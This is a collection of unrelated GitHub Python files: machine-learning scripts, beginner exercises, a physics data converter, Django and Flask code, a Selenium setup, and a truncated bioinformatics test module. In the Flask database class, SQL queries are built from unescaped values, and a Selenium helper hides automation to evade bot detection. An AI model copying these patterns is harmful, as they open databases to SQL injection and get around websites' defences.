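\n# --- Editor's note: illustrative helper, not part of the original script ---\n# The evaluate-and-report block above is repeated verbatim for each model; a\n# small helper like this (the name report_model is ours, for illustration)\n# would express it once:\ndef report_model(name, model, X_test, y_test):\n    preds = model.predict(X_test)\n    print(f'\\n### {name} ###')\n    print('Classification Report:\\n', classification_report(y_test, preds))\n    print('\\nConfusion Matrix:\\n', confusion_matrix(y_test, preds))\n    print(f'Model Accuracy: {model.score(X_test, y_test)}')\n# e.g. report_model('Best model by RandomizedSearchCV', best_model, X_test, y_test)\n\n# Features and their importance\n# features considered most important by the best model\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': 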
list(X_train.columns),'importance': best_model.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\nprint('\\nFinal Scores of different models:')\nprint(f'Decision Tree : {dtree.score(X_test, y_test)}')\nprint(f'Random Forest : {rfc.score(X_test, y_test)}')\nprint(f'Best Model by RandomizedSearchCV : {best_model.score(X_test, y_test)}')\n","repo_name":"akashpunagin/Basics-of-Machine-learning-and-Data-Science","sub_path":"DS and ML Workplace/decision_trees_and_random_forest/project_loans/loans.py","file_name":"loans.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72248330081","text":"stu_a = {\n    \"name\": \"A\", \"age\": 21, \"gender\": 1, \"hometown\": \"Hebei\"\n}\nstu_b = {\n    \"name\": \"B\", \"age\": 22, \"gender\": 0, \"hometown\": \"Shandong\"\n}\nstu_c = {\n    \"name\": \"C\", \"age\": 20, \"gender\": 1, \"hometown\": \"Anhui\"\n}\nfind_name=\"D\"\nstudents = [stu_a, stu_b, stu_c]\nfor stu in students:\n    print(stu)\n    if stu[\"name\"] == \"A\":\n        print(\"Found %s\" % stu[\"name\"])\n        stu[\"name\"] =={\"D\"} # a comparison, so it does not change the original stu_a\n        break\nelse:\n    # If, after every dict in the list has been checked, the search target\n    # was still not found, and we want a single notification of that\n    print(\"Sorry, %s was not found\" % find_name)\nprint(students)\nstudents[0][\"name\"]=\"D\"\nprint(students)\n","repo_name":"lyyzwjj/pythonlearn","sub_path":"base/base1/_12_for_else.py","file_name":"_12_for_else.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28087894633","text":"#!/usr/bin/env python\n\n## Convert BAM Rh files into SXS format\nimport argparse\nimport os\nimport glob\n\nimport h5py\nimport numpy as np\n\n\nparser = argparse.ArgumentParser('bam')\nparser.add_argument(\"--run-directory\", type=str, help=\"BAM run directory\")\nparser.add_argument(\"--output-directory\", type=str, help=\"Output directory\", default=\".\")\nparser.add_argument(\"--extraction-radius\", type=float, help=\"Extraction radius\", default=1100.0)\nparser.add_argument(\"--level\", type=str, help=\"AMR level\", default=1)\nargs = parser.parse_args()\n\nname = os.path.basename(args.run_directory)\n\nf = h5py.File(f\"{args.output_directory}/rh_{name}.h5\", \"w\")\nf.create_group(\"Extrapolated_N2.dir\")\n\npattern = f\"{args.run_directory}/postprocessed/Rh_*_r{args.extraction_radius}_l{args.level}.txt\"\nfor filename in sorted(glob.glob(pattern)):\n    basename = os.path.basename(filename)\n    sp = basename.split(\"_\")\n    # print(sp)\n    l = int(sp[1].removeprefix(\"l\"))\n    m_sign = 1\n    m_str = sp[2].removeprefix(\"m\")\n    if m_str.startswith(\"m\"):\n        m_sign = -1\n        m_str = m_str.removeprefix(\"m\")\n    m = m_sign * int(m_str)\n\n    rh_data = np.loadtxt(filename)\n    ds = f.create_dataset(f\"Extrapolated_N2.dir/Y_l{l}_m{m}.dat\", (len(rh_data),3), dtype='<f8')\n    ds[:,:] = rh_data[:,:3]\n\nf.close()\n
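\n# --- Editor's note: illustrative read-back check, not part of the original script ---\n# A quick sanity check of the file written above; it only re-opens the output\n# file and prints the names and shapes of the datasets this script created.\nwith h5py.File(f\"{args.output_directory}/rh_{name}.h5\", \"r\") as check:\n    for key in check[\"Extrapolated_N2.dir\"]:\n        print(key, check[f\"Extrapolated_N2.dir/{key}\"].shape)\n","repo_name":"unkaktus/rose","sub_path":"utils/bam.py","file_name":"bam.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"70377299361","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.models import Sequential\r\nfrom sklearn.metrics import classification_report\r\n\r\n#dataset path\r\ndata_dir = \"C:/Users/Master/Downloads/archive (3)/tea sickness dataset\"\r\n\r\n#setting image size and batch 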
size\r\nimg_height,img_width=180,180\r\nbatch_size=32\r\n\r\n#training \r\ntrain_data = tf.keras.preprocessing.image_dataset_from_directory(\r\n    data_dir,\r\n    validation_split=0.2,\r\n    subset=\"training\",\r\n    seed=123,\r\n    image_size=(img_height, img_width),\r\n    batch_size=batch_size)\r\n\r\n#validation\r\ntest_data = tf.keras.preprocessing.image_dataset_from_directory(\r\n    data_dir,\r\n    validation_split=0.2,\r\n    subset=\"validation\",\r\n    seed=123,\r\n    image_size=(img_height, img_width),\r\n    batch_size=batch_size)\r\n\r\nclass_names = train_data.class_names\r\nprint(class_names)\r\n\r\nclasses = 8\r\n\r\n#CNN Model\r\nmodel = Sequential([\r\n    layers.experimental.preprocessing.Rescaling(1./255, input_shape=(img_height, img_width, 3)),\r\n    layers.Conv2D(16, 3, padding='same', activation='relu'),\r\n    layers.MaxPooling2D(),\r\n    layers.Conv2D(32, 3, padding='same', activation='relu'),\r\n    layers.MaxPooling2D(),\r\n    layers.Conv2D(64, 3, padding='same', activation='relu'),\r\n    layers.MaxPooling2D(),\r\n    layers.Flatten(),\r\n    layers.Dense(128, activation='relu'),\r\n    layers.Dense(classes,activation='softmax')\r\n])\r\n\r\n\r\n#compile and fitting of the model\r\n#NOTE: the final layer already applies softmax, so the loss must use from_logits=False\r\nmodel.compile(optimizer='adam',\r\n              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),\r\n              metrics=['accuracy'])\r\nmodel.fit(train_data,validation_data=test_data,epochs=15)\r\n\r\n#Prediction using unseen data\r\nimage_batch, label_batch = test_data.as_numpy_iterator().next()\r\npredictions = model.predict_on_batch(image_batch)\r\nclass_predictions = []\r\nfor i in predictions:\r\n    class_prediction = np.argmax(i)\r\n    class_predictions.append(class_prediction)\r\n\r\nclass_predictions = np.array(class_predictions)\r\nprint('Predictions:\\n', class_predictions)\r\nprint('Labels:\\n', label_batch)\r\nprint(classification_report(label_batch, class_predictions))\r\n\r\n#classification report gives accuracy, f1-score, precision and recall","repo_name":"crystelmjojy/TAS-INNOVATION","sub_path":"Task 2.py","file_name":"Task 2.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42141482210","text":"# Randomly generate n numbers and compute their sum, mean, variance and median\nfrom random import *\nfrom time import *\nfrom math import *\n\n# Generate a random list\nt = perf_counter()\nlist1 = []\nfor i in range(10):\n    num1 = randint(0, 100)\n    list1.append(num1)\nlist1.sort()\nprint(\"Randomly generated numbers:\", list1)\n# Sum\nnum2 = 0 # the sum\nfor i in list1:\n    num2 += i\nprint(\"Sum:\", num2)\n# Mean\nlen1 = int(len(list1))\nnum3 = num2 / len1\nprint(\"Mean:\", num3)\n# Variance\nnum4 = 0 # the variance\nfor i in list1:\n    num4 += (i - num3) ** 2\nnum41 = num4 / len1\nprint(\"Variance:\", num41) # variance\n# Median\nnum5 = 0 # the median\nlen2 = float(len1 / 2)\nlen21 = 0\nlen22 = 0\nif len1 % 2 == 0:\n    # the two middle elements of a 0-indexed list sit at n//2 - 1 and n//2\n    len2 = len1 // 2 - 1\n    len21 = len2 + 1\n    num5 = (int(list1[len2]) + int(list1[len21])) / 2\n    print(\"Median:\", num5)\nelse:\n    len22 = int(ceil(len2))-1\n    print(\"Median:\", list1[len22])\nprint(\"Program finished, running time: {}s\".format(perf_counter() - t))\n
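\n# --- Editor's illustrative addition, not in the original file ---\n# The standard library can cross-check the hand-rolled results above;\n# statistics.pvariance is the population variance, matching num4 / len1.\nimport statistics\nprint(\"Cross-check:\", sum(list1), statistics.mean(list1), statistics.pvariance(list1), statistics.median(list1))\n","repo_name":"linzhongxiazhi/student_python","sub_path":"学习/数学问题/和 平均数 方差 中位数.py","file_name":"和 平均数 方差 中位数.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25944252404","text":"from wtforms import Form, StringField, TextAreaField, PasswordField, validators\nfrom blue import database as db\n###SQLAlchemy\n\n\n\n## Register Form Class\nclass RegisterForm(Form):\n    name = StringField('Name', 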
[validators.Length(min=1, max=50)])\n username = StringField('Username', [validators.Length(min=4, max=25)])\n email = StringField('Email', [validators.Length(min=6, max=50)])\n password = PasswordField('Password', [\n validators.DataRequired(),\n validators.EqualTo('confirm', message='Passwords do not match')\n ])\n confirm = PasswordField('Confirm Password')\n# Article Form Class\nclass ArticleForm(Form):\n title = StringField('Title', [validators.Length(min=1, max=200)])\n body = TextAreaField('Body', [validators.Length(min=0)])\n#Template Form class\nclass TemplateForm(Form):\n name = StringField('Name')\n body = TextAreaField('Body')\n param = TextAreaField('Parameters')\n link = StringField('Link')\n'''\nclass Uploaded_files():\n @staticmethod\n def upd(name,path):\n try:\n file = db.File()\n #self.id, self.title,self.body,self.author = cursor\n file.name=name\n file.path=path\n db.db.session.add(file)\n db.db.session.commit()\n return file #'Done'#cls(cursor,list=True)\n except:\n print('test_error')\n return 'Error'\n'''\n\nclass init_table():\n \"\"\"docstring for init_table.\"\"\"\n def __init__(self, arg=None,list=False):\n if list:\n self.list= arg\n print('List=True')\n else:\n print('List=False')\n if arg is not None: self.arg = arg\n @classmethod\n def fetchone(cls,id,where='id'):\n try:\n print(cls.table)\n print(cls.select)\n cursor=db.query_db(\"SELECT {} FROM {} WHERE {} = '{}'\".format(cls.select,cls.table,where,id),one=True)\n print(\"SELECT {} FROM {} WHERE {} = '{}'\".format(cls.select,cls.table,where,id))\n return cls(cursor)\n except:\n print('error')\n return\n @classmethod\n def fetchall(cls,id=1,where=1):\n try:\n print(cls.table)\n print(cls.select)\n print(\"SELECT {} FROM {} WHERE {} = {}\".format(cls.select,cls.table,where,id))\n cursor=db.query_db(\"SELECT {} FROM {} WHERE {} = {}\".format(cls.select,cls.table,where,id))\n print('teset')\n return cls(cursor,list=True)\n except:\n print('error')\n return\n @classmethod\n def set_table_select(cls,table,select='*'):\n cls.table=table\n cls.select=select\n #UPDATE\n #@staticmethod\n\n def add(self,into,value):\n try:\n print(\"INSERT INTO {}({}) VALUES({})\".format(self.table, into,value))\n #db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n db.query_db(\"INSERT INTO {}({}) VALUES({})\".format(self.table, into,value))\n print('add')\n db.get_db().commit()\n print('add')\n return #cls(cursor,list=True)\n except:\n print('add_error')\n return\n\n def update(self,set,id,where='id'):\n try:\n print('{},{},{},{}'.format(self.table, set,where,id))\n print(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id))\n db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n print('update')\n db.get_db().commit()\n print('update')\n return #cls(cursor,list=True)\n except:\n print('update_error')\n return\n\n def delete(self,id,where='id'):\n try:\n #print('{},{},{},{}'.format(self.table, set,where,id))\n print(\"DELETE FROM {} WHERE {} = '{}'\".format(self.table,where,id))\n #db.query_db(\"UPDATE {} SET {} WHERE {} = '{}'\".format(self.table, set,where,id)) #name=?, body=?, param=?, link=?\n db.query_db(\"DELETE FROM {} WHERE {} = '{}'\".format(self.table,where,id))\n print('delete')\n db.get_db().commit()\n print('delete')\n return #cls(cursor,list=True)\n except:\n print('delete_error')\n return\n\n def test(self,view):\n try:\n #for i in [1, 2, 3]:\n # view = File()\n # view.name 
= \"Example1 \" + str(i)\n # print(view.name)\n # view.path = \"example_\" + str(i) + \".pdf\"\n # db.db.session.add(view)\n #view.id=1\n #view.name='test'\n #view.path='path_test'\n\n #admin = User.query.filter_by(username='admin').first()\n #admin.email = 'my_new_email@example.com'\n #rows_changed = User.query.filter_by(role='admin').update(dict(permission='add_user'))\n #Notice that filter_by takes keyword arguments (use only one =) as opposed to filter which takes an expression.\n\n #user = view.query.get(1)\n #user.name = 'New Name123'\n #user = view.query.filter_by(id=3).first()\n #db.db.session.delete(user)\n #db.db.session.commit()\n\n user = db.Articles_new()\n #self.id, self.title,self.body,self.author = cursor\n user.title='test'\n user.body ='test'\n user.author ='test'\n db.db.session.add(user)\n db.db.session.commit()\n return 'Done'#cls(cursor,list=True)\n except:\n print('test_error')\n return 'Error'\n\nclass Articles_old(init_table):\n table='articles_v'\n select='id,title,body,author'\n def __init__(self,cursor=None,list=False):\n #super().__init__(cursor,list=False)\n if list:\n self.list= cursor\n print('List=True')\n else:\n print('List=False')\n if cursor is not None: self.id, self.title,self.body,self.author = cursor\n\nclass Templates(init_table):\n table='template'\n select='id,name,body,param,link'\n def __init__(self,cursor=None,list=False):\n #super().__init__(cursor,list=False)\n if list:\n self.list= cursor\n print('List=True')\n else:\n print('List=False')\n if cursor is not None: self.id, self.name,self.body,self.param,self.link = cursor\n","repo_name":"vikvo11/destacar","sub_path":"flask-blueprint/blue/site/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12456541418","text":"import os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\ndef read_env_file(envFileName = '.env'):\n \"\"\"Attempt to read the .env file.\"\"\"\n try:\n envFile = open(envFileName)\n except:\n # .env file was not found\n return None\n\n envVarList = envFile.read().splitlines()\n for envVar in envVarList:\n envVarKeyVal = envVar.split('=')\n\n if len(envVarKeyVal) == 2:\n os.environ[envVarKeyVal[0]] = envVarKeyVal[1]\n \n return os.environ\n\ndef setup_chrome_driver(enablePerfLogging = False, perfLogPrefs = None):\n \"\"\"Setup undetected ChromeDriver.\"\"\"\n # Make ChromeDriver undetected\n # Also some things you might want to consider...\n # https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver/41220267\n # https://stackoverflow.com/questions/53039551/selenium-webdriver-modifying-navigator-webdriver-flag-to-prevent-selenium-detec\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-blink-features=AutomationControlled')\n\n if (enablePerfLogging):\n # Enable performance log\n # https://chromedriver.chromium.org/logging/performance-log\n caps = DesiredCapabilities.CHROME\n caps['goog:loggingPrefs'] = {'performance': 'ALL'}\n\n if perfLogPrefs:\n options.add_experimental_option('perfLoggingPrefs', perfLogPrefs)\n\n return webdriver.Chrome(desired_capabilities=caps, options=options)\n else:\n return webdriver.Chrome(options=options)\n\ndef setup_url_list(argv):\n \"\"\"Setup the URL list.\"\"\"\n urlList = None\n mode = 'default'\n\n if len(argv) > 2:\n if argv[1] == '-l':\n # Populate url list from text 
file\n            listFile = open(argv[2])\n            urlList = listFile.read().splitlines()\n            mode = 'file'\n\n    if mode != 'file':\n        # Populate url list from CLI args\n        urlList = argv[1:]\n    \n    return urlList\n","repo_name":"mattlean/auto-downloader-core","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74757509602","text":"import os\nimport sys\nimport random\nimport shutil\nimport numpy as np\n\n\"\"\"\nA script that randomly picks files from the root directory and moves them to the target directory.\nOptions allow viewing the number of files in a directory, or using copy instead of move.\nThe number of randomly picked files defaults to 1000;\nit can be changed by passing a number as the num option.\n\n[Usage]\n$ python pick_some.py root_dir target_dir [-l, -c] [num]\n\n[Options]\n-l: show the file counts\n-c: use copy instead of move\nnum: change the number of randomly picked files\n\"\"\"\n\n\ndef _(root, target ,num, is_move=True):\n    files = os.listdir(root)\n    cnt = int(num)\n    l = len(files)\n    if cnt == 0:\n        return -1\n\n    random.seed(0)\n    random.shuffle(files)\n\n    if is_move: operation = shutil.move\n    else: operation = shutil.copy\n\n    for i in range(cnt):\n        file = files[i]\n        operation(root + file, target)\n        if (i % (cnt//10) == 0):\n            progress = int((i / cnt) * 100)\n            print(\" [Processing] ... {0} %\".format(progress))\n    return 1\n\ndef pick_some(root:str, target:str, is_look=False, is_move=True, num_of_pick=1000):\n    num = num_of_pick\n    # If the -l option was given, just show the file counts\n    if is_look:\n        root = argv[1]\n        target = argv[2]\n        files = len(os.listdir(root))\n        copys = len(os.listdir(target))\n        print(\"\\n There exists {0} files @ {1}\".format(files, root))\n        print(\" There exists {0} files @ {1}\\n\".format(copys, target))\n        return 1\n\n    # Perform the copy or move of the files\n    print(\"\\n From {0}, trying to get {1} files...\".format(root, num))\n    files_len1 = len(os.listdir(target))\n    _(root, target, num, is_move)\n    files_len2 = len(os.listdir(target))\n    newfiles = files_len2 - files_len1\n    print(\" [Done] Added {0} files @ {1}\\n\".format(newfiles, target))\n\n\nif __name__=='__main__':\n    argv = sys.argv\n    # The number of arguments must be between 3 and 5\n    if len(argv) < 3 or len(argv) > 5:\n        raise Exception(\"\\n invalid input length ...\")\n    # If only root and target are given, run with the defaults\n    elif len(argv) == 3:\n        pick_some(argv[1], argv[2])\n    # If the -l option is present, set is_look to True\n    elif \"-l\" in argv:\n        argv.remove(\"-l\")\n        if len(argv) == 3:\n            pick_some(argv[1], argv[2], is_look=True)\n        else:\n            raise Exception(\"\\n invalid syntax ...\")\n    else:\n        num_of_pick = \"1000\"\n        is_move = True\n        # If a number is among the arguments, it becomes the num_of_pick argument\n        for arg in argv:\n            if str.isdigit(arg):\n                num_of_pick = arg\n                argv.remove(arg)\n        # If the -c option is given, use copy instead of move\n        if \"-c\" in argv:\n            argv.remove(\"-c\")\n            is_move = False\n        # Run if the processing above reduced the argument list to length 3\n        if len(argv) == 3:\n            pick_some(argv[1], argv[2], is_move=is_move, num_of_pick=num_of_pick)\n\n","repo_name":"TKNRK/works","sub_path":"2017/0808/pick_some.py","file_name":"pick_some.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12251482588","text":"def solution(A):\n    # write your code in Python 3.6\n    nums = {}\n    for i in A:\n        if i in nums.keys():\n            nums[i] = nums[i] + 1\n        else:\n            nums[i] = 1\n    \n    for key, value in nums.items():\n        if value % 2 == 1:\n            return key\n            
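\n\n# --- Editor's illustrative alternative, not part of the original submission ---\n# Under the usual Codility assumption that exactly one value occurs an odd\n# number of times, XOR cancels every paired value and leaves the odd one.\nfrom functools import reduce\nfrom operator import xor\n\ndef solution_xor(A):\n    return reduce(xor, A)\n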
","repo_name":"apulijala/python-crash-course","sub_path":"codility/lesson1/odd_integers.py","file_name":"odd_integers.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5680579365","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom investor import views\nurlpatterns = [\n path('home/', views.home, name=\"investor-home\"),\n path('home/get_tabledata/', views.get_data_table, name=\"investor-home\"),\n path('home/get_graph1data/', views.get_data_graph1, name=\"investor-home\"),\n path('home/post_invest_data/', views.investData, name=\"invest\"),\n path('company_rev_details/<cname>', views.get_data_graph2, name=\"see_details\"),\n path('company_rev_details-ajax/<cid>', views.get_data_graph2_ajax, name=\"see_details_ajax\"),\n path('payment/', views.payment, name=\"payment-gateway\"),\n path('profit-table/', views.profit_table, name=\"profit-table\"),\n]","repo_name":"Rifat-BH/VentureVest","sub_path":"investor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7515554798","text":"__doc__ = \"NOTE: multiprocessing must be patched as indicated by \\\nhttps://hg.python.org/cpython/rev/c82588ca3a79#l1.1\"\n\n\n########################################################\n#~ Import libraries.\n########################################################\nfrom cellery import __object__\nfrom cellery import alignments\nfrom cellery import __classes__\nfrom numpy import array,float32\nfrom string import upper\n\nimport os\nimport unittest\n\n#--------------------------------------------------------\n#~ make dummy object\ndef mkLObjct_Isfrm():\n\t\"\"\"\n\tMake dummy object\n\t\"\"\"\n\tname = 'ENST00000536489'\n\tstrnd = '-1'\n\tcmmNm = 'RPH3AL'\n\tpos = 0\n\tchr = '17'\n\taIntrvls = array([(63435,63714),(65444,65593),(69413,69527),(96901, \\\n\t97076),(169210,169340),(171062,171206),(177257,177370),(202502, \\\n\t202633)])\n\tlenIntrvl = __object__.clcLen(aIntrvls)\n\tsrtdMirnaNms = ['let-7a-5p','miR-181b-5p','miR-19b-2-5p']#sorted miRNAs\n\taMirnaCnts = array([1,2,0],dtype=float32)#counts for TargetScan\n\taMirnaRNAhCnts = array([1,2,1],dtype=float32)#counts for RNA hybrid\n\taMirnaRNAhEngy = array([-21.3,-20.3,-20.0],dtype=float32) #energy for RNA hybrid\n\taMirnaMirndCnts = array([3,2,0],dtype=float32)#counts for miRanda counts\n\taMirnaMirndScrs = array([140.0,146.1,142.0],dtype=float32)#scores for miRanda \n\taMirnaMirndEngy = array([-21.3,-18.64,-15.64],dtype=float32)#energy for miRanda \n\taMirnaSVMicroCnts = array([1,2,3],dtype=float32)#counts for SVMicro\n\taMirnaSVMicroScrs = array([240.0,136.1,122.5],dtype=float32)#scores for miRanda \n\taMirnaTrgtMnrCnts = array([1,0,3],dtype=float32)#counts for TargetMiner\n\taMirnaPITACnts = array([1,1,3],dtype=float32)#counts for miRanda \n\taMirnaPITAScrs = array([40.0,246.1,42.0],dtype=float32)#scores for miRanda \n\taMirnaMirMapScrs = array([32.0,44.1,21.0],dtype=float32)#scores for mirMap\n\taMirnaMirMapCnts = array([2,2,3],dtype=float32)#counts for mirMap\n\taMirnaWalk = array([0,1,0],dtype=bool)#mirWalk confirmation\n\t#make gen object\n\tgene = __classes__.gene(name,srtdMirnaNms)\n\tgene.strnd = strnd\n\tgene.cmmNm = cmmNm\n\tgene.pos = pos\n\tgene.chr = chr\n\tgene.aIntrvls = aIntrvls\n\tgene.len = lenIntrvl\n\tgene.aMirnaCnts = aMirnaCnts\n\tgene.aMirnaRNAhCnts = 
aMirnaRNAhCnts\n\tgene.aMirnaRNAhEngy = aMirnaRNAhEngy\n\tgene.aMirnaMirndCnts = aMirnaMirndCnts\n\tgene.aMirnaMirndScrs = aMirnaMirndScrs\n\tgene.aMirnaMirndEngy = aMirnaMirndEngy\n\tgene.aMirnaSVMicroCnts = aMirnaSVMicroCnts\n\tgene.aMirnaSVMicroScrs = aMirnaSVMicroScrs\n\tgene.aMirnaTrgtMnrCnts = aMirnaTrgtMnrCnts\n\tgene.aMirnaPITACnts = aMirnaPITACnts\n\tgene.aMirnaPITAScrs = aMirnaPITAScrs\n\tgene.aMirnaMirMapScrs = aMirnaMirMapScrs\n\tgene.aMirnaMirMapCnts = aMirnaMirMapCnts\n\tgene.aMirnaWalk = aMirnaWalk\n\treturn [gene]\n\n\n########################################################\n#~ Retrieve sequence alignments in fasta/mirMap format.\n########################################################\ndef runTest_fastaMirMap():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRMirMap = '.fas'# extension for the input alignments for mirmap\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsMirMap(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRMirMap,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRMirMap))\n\tseqTest = dict([(seq.split()) for seq in open(inFst).read(). \\\n\tsplit('>') if seq.strip()])[sppRef]\n\tseqTest = seqTest.replace('-','')\n\treturn seqTest\n\t\n\n########################################################\n#~ Retrieve sequence alignments in fasta/RNAhybrid/PITA/miRanda format \n# (fasta only reference).\n########################################################\ndef runTest_fastaRNAhybridPITAmiRanda():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRMirMap = '.fasta'# extension for the input alignments for mirmap\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsOnlySppRef(lObjcts_Isfrm,pthToMAF, \\\n\textnsnMAF,extnsnUTRMirMap,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRMirMap))\n\tseqTest = dict([(seq.split()) for seq in open(inFst).read(). 
\\\n\tsplit('>') if seq.strip()])['ENST00000536489']\n\tseqTest = seqTest.replace('-','')\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in TargetMiner format.\n########################################################\ndef runTest_targetMiner():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRTrgtMnr = '.tmr'# extension of UTR file for TargetMiner\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.procssUTRTrgtMnr(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRTrgtMnr,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRTrgtMnr))\n\tseqTest = dict([(seq.split()[0],seq.splitlines()[1]) for seq in \\\n\topen(inFst).read().split('>') if seq.strip()])['ENST00000536489']\n\tseqTest = upper(seqTest.replace('-',''))\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in TargetScan format.\n########################################################\ndef runTest_targetScan():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToMAF = os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnUTRTrgtScn = '.utr'# extension of UTR file for TargetScan\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. 
a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.proccsMAFnUTRsTrgtScn(lObjcts_Isfrm,pthToMAF,extnsnMAF, \\\n\textnsnUTRTrgtScn,alignmntsFldr,sppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnUTRTrgtScn))\n\tseqTest = dict([(seq.split()[1],seq.split()[2]) for seq in \\\n\topen(inFst).read().split('>') if seq.strip()])['9606']\n\tseqTest = seqTest.replace('-','')\n\tseqTest = seqTest.replace('U','T')\n\treturn seqTest\n\n\n########################################################\n#~ Retrieve sequence alignments in SVMicro format.\n########################################################\ndef runTest_SVMicro():\n\t#--------------------------------------------------------\n\t#~ Define variables\n\tdbFldr = os.path.join('tests2','db')# db folder\n\tpthToPhstCns = os.path.join(dbFldr,'phastCons46way.d')\n\textnsnPhstCns = '.phastCons46way.wigFix.gz'\n\tpthToMAF = 